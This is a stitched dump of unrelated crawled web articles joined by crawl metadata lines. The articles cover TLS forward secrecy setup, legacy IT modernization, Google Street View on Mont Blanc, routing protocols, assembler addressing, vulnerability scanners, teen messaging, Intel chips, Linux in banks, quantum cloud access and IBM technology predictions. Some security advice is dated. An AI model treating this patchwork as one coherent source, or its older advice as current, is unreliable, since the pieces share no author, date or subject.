With revelations about mass surveillance in the news everywhere, an obscure feature of SSL/TLS called forward secrecy has suddenly become very interesting. So what is it, and why is it so interesting now? Session keys generation and exchange Every SSL connection begins with a handshake, during which the parties communicate their capabilities to the other side, perform authentication, and agree on their session keys, in the process called key exchange. The session keys are used for a limited time and deleted afterwards. The goal of the key exchange phase is to enable the two parties to negotiate the keys securely, in other words, to prevent anyone else from learning these keys. Several key exchange mechanisms exist, but, at the moment, by far the most commonly used one is based on RSA, where the server’s private key is used to protect the session keys. This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server’s private key can also uncover the session keys and thus decrypt everything. For some, the side-effects are desirable. Many network security devices, for example, can be configured to decrypt communication (and inspect traffic) when given servers’ private keys. Without this capability, passive IDS/IPS and WAF devices have no visibility into the traffic and thus provide no protection. In the context of mass surveillance, however, the RSA key exchange is a serious liability. Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic. Eventually, they might obtain the key in one way or another (e.g., by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances) and, at that time, they will be able to go back in time to decrypt everything. Diffie-Hellman key exchange An alternative to RSA-based key exchange is to use the ephemeral Diffie-Hellman algorithm, which is slower, but generates session keys in such a way that only the two parties involved in the communication can obtain them. No one else can, even if they have access to the server’s private key.1 After the session is complete, and both parties destroy the session keys, the only way to decrypt the communication is to break the session keys themselves. This protocol feature is known as forward secrecy.2 Now, breaking strong session keys is clearly much more difficult than obtaining servers’ private keys (especially if you can get them via a warrant). Furthermore, in order to decrypt all communication, now you can no longer compromise just one key (the server’s), but you have to compromise the session keys belonging to every individual communication session. SSL and forward secrecy SSL supports forward secrecy using two algorithms, the standard Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). Why isn’t everyone using them, then? Assuming the interest and knowledge to deploy forward secrecy is there, two obstacles remain: - DHE is significantly slower. For this reason, web site operators tend to disable all DHE suites in order to achieve better performance. In recent years, we’ve seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys. - ECDHE too is slower, but not as much as DHE. (Vincent Bernat published a blog post about the impact of ECDHE on performance, but be warned that the situation might have changed since 2011. I am planning to do my own tests soon.) However, ECDHE algorithms are relatively new and not as widely supported. For example, they were added to OpenSSL only fairly recently, in the 1.x releases. If you’re willing to support both ECDHE and DHE, then you will probably be able to support forward secrecy with virtually all clients. But ECDHE alone is supported by all major modern browsers, which means that even with only ECDHE you might be able to cover a very large chunk of your user base. The decision what to do is entirely up to you. Google, for example, do not support any DHE suites on their main web sites. Configuring forward secrecy Enabling forward secrecy can be done in two steps: 1. Configure your server to actively select the most desirable suite from the list offered by SSL clients. 2. Place ECDHE and DHE suites at the top of your list. (The order is important; because ECDHE suites are faster, you want to use them whenever clients supports them.) Knowing which suites to enable and move to the top can be tricky, because not all browsers (devices) support all forward secrecy suites. At this point you may want to look for inspiration from those who are already supporting forward secrecy, for example Google. In the nutshell, these are some of the suites you might want to enable3 and push (close) to the top: To make this process easier, I’ve added a new feature to the SSL Labs test; this feature, tentatively called handshake simulation, understands the capabilities of major browsers and determines which suite would be negotiated with each. As a result, it also tells you if the negotiated suite supports forward secrecy. Here’s what it looks like in action: When you get it right, you will be rewarded with a strong forward secrecy indicator in the summary section at the top: Alternative attack vectors Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions powerful adversaries could take. For example, they could convince the server operator to simply record all session keys. Server-side session management mechanisms could also impact forward secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated (possibly never in extreme cases). Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise forward secrecy. (1) Someone with access to the server’s private key can, of course, perform an active man in the middle attack and impersonate the server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic to decrypt later. (2) It’s also sometimes called perfect forward secrecy, but, because it is possible to uncover the communication by breaking the session keys, it’s clearly not perfect. (3) I am assuming the most common case, that you have an RSA key (virtually everyone does). There’s a number of ECDHE suites that need to enabled if you’re using an ECDSA key. I am also ignoring GCM suites for the time being, because they are not very widely supported. I am also ignoring any potential desire to mitigate BEAST by favouring RC4, which might be impossible to do across all client devices.
<urn:uuid:5eb8cecb-b0a8-4564-b5e8-2c22642bce24>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/06/26/ssl-labs-deploying-forward-secrecy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931003
1,478
3.265625
3
Modernize Legacy Systems to Enable Full Potential This is the first of a two-part series on modernization of legacy systems. Read part two. Many topics discussed in this article are independent of platform—mainframe, client-server and distributed systems. The word modernization is used to describe ongoing innovation that’s worked into an application in periodic projects or more gradually over time. Sometimes applications run for a long time with only business or defect maintenance applied, then suddenly they need to be modernized as they lack important features relating to their user interface or the way that data management is handled. Overview of Legacy Systems Legacy systems are sometimes called “systems of record.” They could be running on mainframe, client-server, multi-tier distributed systems or a hybrid combination of different architectures. To some, the phrase legacy system is a pejorative term. To others, a legacy system has the advantage of being an incumbent system that’s running and providing value to the organization. What Is Modernization? Modernization can mean different things to different people in IT. Legacy or software modernization refers to the conversion, rewriting or porting of an existing application to a modern computer programming language with new libraries, protocols or hardware platform. The goal of this transformation aims to retain and extend the value of the past software investment through migration to a new platform. This is one way of describing modernization where you make a significant change in the context of a one-time project. Other definitions involve leaving the legacy platform in place and providing updated interfaces like supplementing CICS maps with a web front end or using modern API software to create an application that transforms the data in the legacy application without any changes to the application itself. Another incremental modernization approach would involve selective replacement (e.g., swapping convention file systems with a database management system). Doing this opens the door to many advantages that derive from using a database versus a file system and you don’t have to replace all the files. Many companies have embraced the idea that applications should be both maintained and modernized as part of normal day-to-day operations. These companies have money and people allocated to a given application set. They distribute resources between fixing the application and making other necessary changes, leaving time and assets for keeping up with strategic needs. This has become a common practice for companies that are balanced in their approach and are trying to avoid plunging into a large-scale technology migration. Benefits, Strategies, Risk and Cost Modernization should be an ongoing activity in the lifecycle of a system or application. Changes in business practices cause changes in an application, as does the rapid evolution of technology. Careful planning is required to balance routine change and strategic initiative but this isn’t too much to expect for a mission-critical application. One benefit of modernization is continued satisfaction with an application after it’s updated with a web interface or application on a mobile device. Without these improvements, user satisfaction could decline. Improved productivity is also a benefit of modernization. The use of mobile devices with an application can mean that a user can take a tablet onto the production floor to check inventory, with a customer on the phone, without having to go back to their desk to enter transactions. Today, many companies are embracing process improvements like continuous integration and deployment methods. These practices support modernization changes like adding a new capability or changing a function in a parallel implementation. In many ways, modernization is a good fit for these new IT processes making it possible to integrate modernization with the other ongoing activities. There’s risk in making change, both maintenance and modernization. There’s also risk in not embracing new technology. When a company’s competitor is building applications for smartphones and the company doesn’t have a similar initiative, there’s a risk of loosing a future customer base that has significant digital expectations. For many industries, customers with modern digital preferences are highly desirable, high-income users. Ongoing modernization is less costly than replacement, as it preserves the function in the current system. Certain kinds of modernization (e.g., embracing automated testing and deployment) can reduce overall costs and improve application quality. Challenges and Areas of Focus When making a significant modernization change to an application, an incremental approach is least disruptive and should be used whenever possible. Often, this means breaking up a large project into smaller units that can be piloted, or run in phases or in parallel with the existing functionality. For modernization, what should be the focus? A place to start is updating the user interface, which often means utilizing the web and making use of mobile devices. Another area is data modernization, which might involve converting from files to databases and layering other functionality like data replication. Another area for modernization is function modernization, which has to do with enhancements like packaging application elements into components for use as services. Another focus for modernization could be rooted in making good use of enhancements in the current software technology that’s supporting the application. If the application is written in COBOL, look at one of the latest release like Enterprise COBOL for z/OS Version 5. This release, among other features, makes use of the latest z/Architecture and performance optimization, delivers XML processing enhancements for easier web interoperability, and increases compiler limits to handle larger data items and larger groups of data and to improve application exploitation of system resources. Like COBOL, CICS and IMS have significant functional enhancements in each release that should be put to use by applications as part of ongoing modernization. Making fuller use of the middleware that is foundational to the application has the potential for significant gain that on balance may not be difficult to implement. The next article explores in detail specific tactics to use within specific areas, including updating the user interface, data modernization, function modernization, process modernization, and more fully using language and middleware enhancements. Like what you just read? To receive technical tips and articles directly in your inbox twice per month, sign up for the EXTRA e-newsletter here. comments powered by
<urn:uuid:1bed5511-9d8d-41a7-a1e8-b6a778a0e967>
CC-MAIN-2017-04
http://ibmsystemsmag.com/ibmi/developer/modernization/legacy-system/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00413-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918035
1,248
2.78125
3
Ah, Google, your Street-View publicity stunts never fail to entertain. This time, the Mountain View pranksters have stuck their 360-degree cameras up an actual mountain—Mont Blanc, to be precise. In fact, Google claims to also be helping scientists track the effects of global climate change warming. This is while the ice atop the massif is said to be shrinking. In IT Blogwatch, bloggers feel cold just looking at it. Your humble blogwatcher curated these bloggy bits for your entertainment. We need news. Trevor Hughes has views on the views—Google Street View cameras top Mont Blanc for 360-degree views: Google has made it possible to visit one of Europe’s most storied peaks from the comfort of your computer...Mont Blanc, the highest of the Alps. The peak on the French-Italian border is about 15,777 feet high [and] covered in a perpetual snow-and-ice field. Viewers also can virtually “walk” across the Mer de Glace — a river of ice that experts...say is endangered by global warming. Viewers also can [get] the perspective of a paraglider, a speeding trail-runner and a skier who shows off some dazzling aerial flips. Far out, man. Frederic Lardinois writes Google Hauls Its Street View Cameras Up The Mont Blanc: For this project, Google partnered with a number of photographers, skiers, mountaineers, climbers and runners to build up this library of...imagery. You get images of some of the most iconic trails around the mountain in the summer and winter [and] see what Mont Blanc looks like from the perspective of an ice climber, for example. Now here's an appropriate name. It's Cam Bunton, with Google’s latest breathtaking addition to Street View is a virtual tour of Mont Blanc: Google’s new virtual exploration is simply breathtaking, and easily worth a few minutes of your time. Google has littered the mountain with a bunch of awesome 360-degree Photo Spheres. You’ll get a look around the summit. ... You’ll be able to climb up a serac. Google wants to preserve what it can...so that future generations can see what it used to look like, and so that scientists can see how it’s changing. But why does Google do these things? Tom Dawson thinks he knows—Google Brings Street View to Majestic Mont Blanc: Street View has become an interesting side-project for the Google Maps team, and it’s arguably become part of pop culture. Street View now offers users one more piece of culture to explore from the comfort of their tablets, phones or computers. We can’t help but think Google is doing these sort of things...to help with their Cardboard project. Regardless, there’s more fun and inspiring content to oggle over. We could do with a local voice, too. Bonjour, Oliver Gee. Ça va? Climb Mont Blanc from your armchair thanks to Google: The American search engine sent a team of climbers, skiers, and photographers to the summit. ... The result is spectacular. For the ascent...it was elite guide Korra Pesce who carried the Street View Trekker up...the Goûter Route of the mountain. See a summary...in the video below. You have been reading IT Blogwatch by Richi Jennings, who curates the best bloggy bits, finest forums, and weirdest websites… so you don’t have to. Catch the key commentary from around the Web every morning. Hatemail may be directed to @RiCHi or firstname.lastname@example.org. Opinions expressed may not represent those of Computerworld. Ask your doctor before reading. Your mileage may vary. E&OE.
<urn:uuid:f34daf4c-e13a-4e05-b46a-4c02afa2988b>
CC-MAIN-2017-04
http://www.computerworld.com/article/3025484/cloud-computing/google-street-view-mont-blanc-itbwcw.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00257-ip-10-171-10-70.ec2.internal.warc.gz
en
0.906088
813
2.78125
3
We’ve discussed several techniques to improve the performance of Distance-Vector (D-V) protocols. With that accomplished, the next thing to do is to examine their scalability. With the D-V protocols, as the size of an internetwork grows, the number of prefixes to be advertised and stored grows, requiring greater bandwidth and RAM. Also, as the number of routing updates increases, more CPU power is required to send and receive the updates. Around 1990, based on the projected growth of internetworks, it became apparent that the scalability of the D-V protocols would present a problem. To deal with this, an entirely new category of routing protocols was developed: the “Link-State” protocols. Each Link-State router builds a topology database that contains everything that router knows about the topology of the internetwork. This information includes which IP prefixes are directly connected to which routers, and the metric information for each prefix. It’s referred to as a “Link-State” protocol because each router knows the detailed prefix (link) and metric (state) information…in other words, the state of the links. It’s like a jigsaw puzzle, where each router contributes a piece of the puzzle (the prefixes to which it is directly connected). The goal is to collect all of the pieces, and then assemble the puzzle. Each router begins by placing an entry for itself in its topology database. Next, the router uses a “hello” protocol to discover its directly connected neighbors. The neighbors then exchange topology information. When an update containing new topology information is received, the router adds that piece to its topology database, and then floods that piece. Each neighbor does the same. When this process is complete, all routers will have detailed information about the entire topology, and each router can then determine the best path from itself to each destination prefix. Think of the internetwork as being like a shopping mall. There’s a map near each door that shows where all the stores are. Because it’s all one mall the maps are identical, except for one thing: the “You Are Here” marker. We can use the nearest map to find the best route from where we are to each of the stores that we’d like to visit. Similarly, each router has a topology database. Because all of the routers are part of one internetwork, all of the topology databases are identical. Using its copy of the topology database, each router individually calculates the best next hop for each known destination prefix, and places this information in its routing table. At this point, routing has converged. There are, however, a few differences between a real Link-State protocol and our shopping mall analogy. First, the maps in the mall are diagrams, while routers keep the topology databases in table form. Second, while most shoppers are interested in visiting only a few stores within the mall (there may be exceptions), routers calculate the best next hop for all known prefixes. Key Point: With a Link-State protocol, what’s being advertised from one router to another is raw topology information, not routing table entries. As a result, each Link-State router knows the entire topology of the internetwork. Since the topology updates are acknowledged (making the protocol reliable), there is no need for frequent periodic updates. Instead, updates need only be sent when a topology change occurs. In between changes, the hello protocol is used to verify the continued availability of neighbors. Next time, we’ll look at Link-State protocols in more detail, including some real-world examples. Author: Al Friebe
<urn:uuid:7baa68ff-0d51-4dd7-89aa-cb7d451d5f4c>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2009/10/26/routing-protocols-part-6/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00073-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929266
771
2.859375
3
"Everybody thinks kids are ruining their language by using instant messaging, but these teens' messaging shows them expressing themselves flexibly through all registers," linguist Sali Tagliamonte said in a prepared statement. "They actually show an extremely lucid command of the language. We shouldn't worry." Researchers at the University of Toronto report that IM does not deserve its bad reputation as a syntax spoiler. Tagliamonte and Derek Denis studied about 70 Toronto teens and compared their use of language in speech and instant messaging. They presented their findings at the Linguistics Society of Canada and the United States annual meeting Wednesday. According to the researchers, 80 percent of Canadian teens use instant messaging and adopt its shorthand. The study found that instant messaging language mirrors patterns in speech but teens fuse informal and formal speech. It concluded that adverse claims about instant messaging are overblown. "Teens are using both informal forms that their English teachers would never allow, yet they also use formal writing phrasing that, if used in speech, would likely be considered 'uncool," the researchers said through a statement released Monday.
<urn:uuid:a83d3bbb-26db-41a7-9580-270867506060>
CC-MAIN-2017-04
http://www.networkcomputing.com/unified-communications/teens-im-talk-ok-study/1274320738
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00467-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963074
221
2.546875
3
The influence of Linux has created new choices in the marketplace, resulting in an unparalleled opportunity for banks to develop ground-breaking technology architectures, whether or not they eventually adopt the new operating system. For the major software camps - IBM, Sun Microsystems and Microsoft - Linux represents a monumental strategic turning point, and the resulting computing environment for their customers is no less revolutionary. In the early days of enterprise computing, there was a one-to-one correspondence among hardware platforms, operating systems and applications. Applications were written to run on specific operating systems, and an operating system worked only on a certain class of hardware. The entire "stack" comprised an indivisible unit. But thanks to the influence of Linux, that cozy world is gone. Linus Torvalds began writing the Linux operating system in 1991 to teach himself how to use the Intel 80386 chip. As such, the program was initially designed to take advantage of the chip's idiosyncrasies. But the operating system itself was not idiosyncratic - it was based on the same technical specifications as the Unix operating system running on mainframes. Linux soon gained adherents. Some were attracted by the philosophy of the open-source movement, while others found it to be an inexpensive way to host a Web server. Technology professionals quickly recognized the business potential of Linux. By porting Unix applications to Linux, it would be possible to swap out high-cost Unix servers for commodity x86 machines. Until that point, the only migration option for a Unix shop had been to rebuild and redevelop under Windows, which typically was not an attractive proposition for companies with significant legacy investments.
<urn:uuid:bb32b5db-b31b-4a15-96f9-49b8ec92f9cd>
CC-MAIN-2017-04
http://www.banktech.com/data-and-analytics/http--wwwintelligententerprisecom-channels-applications-showarticlejhtmlarticleid-201202011/d/d-id/1290115
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00009-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952071
330
2.8125
3
For the last 7 or 8 years, cable has been the dominant player in high speed internet access. Like Kleenex with tissues and Q-Tips with cotton swabs, cable companies have carved out such a dominant position within the industry that many people now view “cable” and “high speed internet” as terms that can be used interchangeably. Now is a particularly interesting time to be discussing cable because it is facing a major challenger to its market dominance in Verizon Fios. How It Works Cable networks form the bridge between your home computer and the high-speed data lines that are the backbone of the internet. As mentioned above, the main data transmission lines within cable networks are fiber, but the individual lines (or “last mile”) that are run into people’s homes are coaxial cable. This is similar to how DSL networks operate: fiber optics for most of the network, legacy twisted copper telephone lines for the last mile to individual homes. However, unlike DSL, coaxial cable is shielded which means that it does not suffer from the signal loss issues that twisted copper telephone lines do over distances. This is probably the single biggest reason why cable has successfully dominated DSL in the US, because cable companies were so effective at reminding consumers that “cable is always fast, whereas DSL isn’t fast if you are too far away from the provider”. That is not an entirely true statement however, as cable has its own speed-related issues. If you live in a population dense area where many people use cable (i.e. an apartment building), your connection can be slowed because you are sharing the same coaxial cable lines as other people. Cable is like DSL in that a single transmission line is used: the same transmission lines used for cable television are also used for cable internet. In order to give you both cable television and internet, a splitter is installed on the coaxial cable coming into your home, with one end going to your cable television box and the other end going to a cable modem. Keys to Cable 1) Don’t Be Dense – If you live in an apartment building or other population dense area, it is good idea to investigate how fast a cable connection will be. Seek out neighbors who have cable internet service and find out how fast they think the service is or see if they will actually let you test drive their connection. 2) Know Your Limits – Cable internet service is usually offered at 3 (or even more) different speed levels, each at various price points. Making an initial speed selection is important, but not as important as testing the actual speed that you are getting once it is installed. You sometimes won’t be able to get the speeds that are advertised do to the speed issues identified above. So if you’re paying for a higher speed than you’re capable of getting, make sure you adjust your plan down to a lower speed level so you don’t overpay month to month. Click the “Internet Speed Test” link on the right-hand side of the page to test your speed once you are up and running to see if any plan adjustment is necessary. 3) Make a Deal – Cable internet connections are generally offered by cable companies like Comcast and Time Warner that are well-known for offering discounts on bundled services, like VoIP phone, cable television and cable internet service. Make sure you take advantage of these deals by bundling your services together.
<urn:uuid:7ef56704-e8e7-408e-b82a-b27d8220deec>
CC-MAIN-2017-04
http://www.highspeedexperts.com/internet-services/cable/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00311-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953096
722
2.71875
3
As we have seen, all symbolic addresses are based on variants of the concept of base address (stored in a base register) and an offset. Note that the offset, encoded as a 12–bit unsigned integer, is always non–negative. The possible offset values range from 0 through 4095 inclusive. We now introduce a way to reference a storage position relative to the symbolic address of another label. This allows direct reference to unlabeled storage. The form of a relative address where N is the byte offset of the desired storage relative to the symbolic address associated with LABEL. Again, note the lack of spaces in the relative address. This is important. Consider the two data declarations. F1 DC F‘0’ A four–byte full-word. F2 DC F‘2’ Another full-word at address F1 + 4 Consider the following two instructions. They are identical. L R6, F2 L R6, F1+4 Relative Addressing: A More Common Use The most common use of relative addressing is to access an unlabeled section of a multi–byte storage area associated with a symbolic address. Consider the following very common declaration for card data. It sets aside a storage of 80 bytes to receive the 80 characters associated with standard card input. CARDIN DS CL80 While only the first byte (at offset 0 from CARDIN) is directly named, we may use relative addressing to access any byte directly. Consider this figure. The second byte of input it is at address CARDIN+1, the third at CARDIN+2, etc. Remember that the byte at address is the character in column (N + 1) of the card. Punched cards do not have a column 0.
<urn:uuid:ac2275a0-246a-4695-9782-989b27bcee12>
CC-MAIN-2017-04
http://www.edwardbosworth.com/MY3121_LectureSlides_HTML/RelativeAddressing.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00219-ip-10-171-10-70.ec2.internal.warc.gz
en
0.854381
393
3.796875
4
Recently, Microsoft released security updates for a total of 23 vulnerabilities for Microsoft products. While this may seem like a lot, these situations do occur. This points to the speed at which new exploits are created and the fact that vendors must rush to patch these vulnerabilities. Some of the most common vulnerabilities businesses face today are unpatched systems and applications. This is one of the primary reasons why vulnerability assessment tools have become so important. These tools can find and identify needed patches, insecure settings, buffer overflows, and a whole host of other security issues. Luckily, there are many vulnerability assessment tools that can be used to find these problems and fix them before they are exploited. Believe it or not, vulnerability assessment was not created until the mid 1990s. One of the first was Security Administrator Tool for Analyzing Networks. Dan Farmer and Wietse Venema developed it and since then, there have been many vulnerability assessment tools developed. Some examples include: - LAN Guard - Open VAS What all of these tools have in common is that they assess an organization’s applications, computers, and networks to identify technical vulnerabilities before an attacker can exploit them. Generally, vulnerability assessment tools fall into three basic categories: source code scanners, application scanners, and system scanners. System scanners are one of the most widely used as they probe networks, systems, and their components rather than individual applications. They are also used to test the effectiveness of layered security measures. Most users tend to run these tools on a periodic basis such as weekly or bi-weekly. Most of these tools will list discovered vulnerabilities as: critical, high, medium, or low. Once identified, these tools will point you to a means to mitigate the problem, typically through the installation of a patch. The discovered problems are identified by means of a CVE. The CVE or Common Vulnerabilities and Exposures, is simply a system designed to provide a reference-method for publicly known information-security vulnerabilities and exposures. If you’ve never looked at the list of CVEs, you will want to check out http://cve.mitre.org. My personal tip is that even if your company cannot afford a commercial vulnerability assessment tool start with a free one such as Open VAS. Running a vulnerability scanner on a periodic basis is one of the most effective things a business can do to avoid common vulnerabilities. Also, keep in mind that you may not be able to fix all identified vulnerabilities. Start with what is identified as critical. These issues should be your first priority then work on items identified as high, medium, and low. Once you get the vulnerability system up and running then you can start using it long term to measure, monitor, and report on information security progress. The best time to start using one of these tools is now, don’t wait until you have a security breach!
<urn:uuid:a2f6fdaf-6d8f-47b2-ae8f-0a23a163a9d7>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2013/06/28/vulnerability-assessment-tools/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00127-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946726
583
2.734375
3
Intel Remixes Chip Recipe to Cut Power The chipmaker will add, in 2007, a new manufacturing process aimed helping it cook up low power chips.Intel Corp. plans to begin cutting the power consumption of its chips right at the factory. The chip giant will on Tuesday unveil a plan to create an alternate version of its manufacturing process technologythe means by which it knits together the transistors that make up the circuits inside its chipsdesigned to yield more power-efficient processors and supporting chipsets for notebooks, handhelds and other battery-powered devices. Intel, which at one time focused much of its efforts on building faster and faster processorschips that inevitably also used more powerhas taken a new path of late, announcing plans to deliver less power-hungry processors within all of its x86 product lines, including desktop, notebook and server chips, in 2006. By the end of the decade, the company has said it will deliver chips that use even less power for handheld devices. It intends the alternate manufacturing process to dovetail with the low-power chip design efforts. The new process, which is based on P1264 or Intels 65-nanometer manufacturing technology thats due to come on line later this year, tweaks the way transistorsthe tiny on/off switches inside its chipsas well as the wires that connect them, are formed. The changes, which include steps such as thinning the wires slightly and thickening the layers of material that insulate a part of the transistor known as the gate, help cut down on leakage or electricity that slips past after a transistor switches off, Intel representatives said.
<urn:uuid:49b0b8bc-1de9-4c19-8aab-6185abf74c48>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Desktops-and-Notebooks/Intel-Remixes-Chip-Recipe-to-Cut-Power
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00127-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954053
327
2.921875
3
Quantum computing is still in it infancy, but soon anyone with a Web browser will have access to an early form of this powerful computing technology. At the British Science Festival, Professor Jeremy O’Brien from the University of Bristol announced a ground-breaking project called Qcloud that aims to give everyone access to quantum computing via the Internet. Quantum computing is based on units of information known as qubits. These qubits exist in multiple states at the same time, a phenomenon known as superposition. The nature of qubits means that answers can be computed simultaneously. It’s an inherently parallel form of computing, and it’s thought to be exponentially faster than conventional computing, based on binary states (zeros and ones). The first commercial quantum computer was pioneered by Canadian firm D-Wave Systems. Early adopters of D-Wave machines include Lockheed Martin, the University of Southern California, NASA and Google. There is an on-going discussion over whether D-Wave’s technology should actually be considered quantum computing, but setting aside these arguments, the quantum systems that do exist have very limited access. Scientists at the University of Bristol were concerned that current quantum technology was limited to so few users. They believe that to create a healthy ecosystem requires making the tools accessible to more people. As of September 20, the quantum photonic processor housed at the Centre for Quantum Photonics at the University of Bristol will be available to researchers from anywhere in the world via remote access over the Internet. Not everyone will get the chance to manipulate the quantum machine, not at first anyway. Initially, members of the public will be able to access a quantum simulator. (User guides and manuals help explain the basics.) Once the novice quantum coders have developed a working simulation, they can submit a proposal requesting that it be run on the real McCoy. Project leader, Professor Jeremy O’Brien said: “This technology has helped accelerate our research and is allowing us to do things we never thought possible. It’s incredibly exciting to think what might be achieved by making this more widely accessible, not only to the brightest minds already working in research, but to the next generation. I hope that by helping schools to access this technology, and working with the British Science Association to provide educational content around quantum computing, we can achieve incredible things.” The Qcloud computer is based on a silicon micro-chip, but instead of using electricity conducted on small wires it employs quantum states of light called photons. As the photons pass through the chip, they become entangled, meaning that actions performed on one effect the other. With processor fab techniques nearing the limits of nanoscale and the most common encryption techniques coming under attack, quantum computing holds enormous appeal to researchers and government entities. But don’t expect too much from these early systems. The version being used online only has two qubits. It’s no more powerful than a PC, noted project lead O’Brien. The University of Bristol researchers are working on 6- and 8-qubit versions, however those systems are still in development. Interested in participating? The access point for the project is bristol.ac.uk/quantum-computing. The simulator is up and running now, and the actual quantum processors will be available for remote access starting Sept. 20. A video of Jeremy O’Brien giving a TEDMED talk about the strange characteristics of quantum physics and the profound impact for several areas of health care.
<urn:uuid:fa7cd90a-fdcd-4319-9701-456d144d3709>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/09/10/quantum_computing_for_everyone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00523-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939847
716
3.859375
4
Great scientific leaps rarely happen incrementally. They come from setting big, ambitious goals that move discovery forward. Think of the Wright brothers’ determination to fly, President John F. Kennedy’s pledge to put a man on the moon, or IBM Research’s resolve to build a computer that could understand spoken language and beat the greatest human champions on Jeopardy! The bigger the goal, the greater the impact on society. This approach has been a hallmark of IBM Research since our founding more than 70 years ago, and it is responsible for many world-changing inventions. In that spirit, today we’re renewing our annual “5 in 5” predictions about five technologies that we believe have the potential to change the way people work, live, and interact during the next five years. IBM Research began the 5 in 5 conversation a decade ago as a way to stimulate interest and discussion around some of the most exciting breakthroughs coming out of our labs. Then, as now, this effort was informed by the breadth of IBM’s unmatched expertise across systems, software, services, semiconductors and a wide swath of industries. Forecasting is always a tricky business, but over the past ten years many of our 5 in 5 predictions have proven highly accurate in spotting and accelerating emerging technologies. For example: In 2012, IBM Research predicted that computers would not only be able to look at pictures, but understand them. The field of computer vision has advanced rapidly over the last several years, to the point where our scientists have designed systems with a computational form of sight that can examine images of skin lesions and help dermatologists identify cancerous states. That same year, we projected that computers will “hear” what matters. Significant advances are being made in creating cognitive systems that can interpret and analyze sounds to create a holistic picture of our surroundings. Very recently, in collaboration with Rice University, IBM announced a sensor platform that can “see”, “listen”, and “talk” and aids senior citizen for staying healthy, mobile, and independent. Also in 2012, we envisioned digital taste buds that could help people to eat smarter. IBM researchers turned to the culinary arts to see if Watson, the world’s first cognitive computing system, could help cooks discover and create original recipes with the help of flavor compound algorithms. They trained Watson with thousands of recipes and learning about food pairing theories. Two years later, Chef Watson debuted at SXSW, followed by a web application for home cooks. In 2013, our scientists anticipated that doctors will routinely use your DNA to keep you well. Full DNA sequencing is on its way to becoming a routine procedure. The following year, New York Genome Center and IBM started a collaboration to analyze genetic data with Watson to accelerate the race to personalized, life-saving treatment for brain cancer patients. In 2015, IBM announced another collaboration with more than a dozen leading cancer institutes to accelerate the ability of clinicians to identify and personalize treatment options for their patients. For this year’s 5 in 5, we’re struck by the powerful implications of the ongoing effort to make the invisible world visible, from the macroscopic level down to the nanoscale. Innovation in this area could enable us to dramatically improve farming, enhance energy efficiency, spot harmful pollution before it’s too late, and prevent premature cognitive decline. Our global team of scientists and researchers is steadily bringing this capacity from the realm of science fiction to the real world. You can read a detailed summary of the remarkable innovations we believe will result from this work over the next five years here. Below is a quick overview of our 5 in 5 predictions: With AI, our words will be a window into our mental health. In five years, what we say and write will be indicators of our mental health and physical wellbeing. Patterns in our speech and writing analyzed by cognitive systems will enable doctors and patients to predict and track early-stage developmental disorders, mental illness and degenerative neurological diseases more effectively. Hyperimaging and AI will give us superhero vision. In five years, our ability to “see” beyond visible light will reveal new insights to help us understand the world around us. This technology will be widely available throughout our daily lives, giving us the ability to perceive or see through objects and opaque environmental conditions anytime, anywhere. Macroscopes will help us understand Earth’s complexity in infinite detail. The physical world before our eyes only gives us a small view into what’s an infinitely interconnected and complex world. Instrumenting and collecting masses of data from every physical object, big and small, and bringing it together will reveal comprehensive solutions for our food, water and energy needs. Medical “labs on a chip” will serve as health detectives for tracing disease at the nanoscale. New techniques that detect tiny bioparticles found in bodily fluids will reveal clues that, when combined with data from the Internet of Things, will give a full picture of our health and diagnose diseases before we experience any symptoms. Smart sensors will detect environmental pollution at the speed of light. Environmental pollutants won’t be able to hide thanks to new sensing technologies that utilize silicon photonics to accurately pinpoint and monitor the quality of our environment. Together with physical analytics combined with artificial intelligence, these technologies will unlock insights to help us prevent pollution and fully harness the promise of cleaner fuels like natural gas. The combination of data explosion and exponential computation growth over the past fifty years has opened up whole new challenges for us to work on and solve together – challenges we never could have tackled or even foreseen in the past. This “digital disruption” is transforming the world around us. 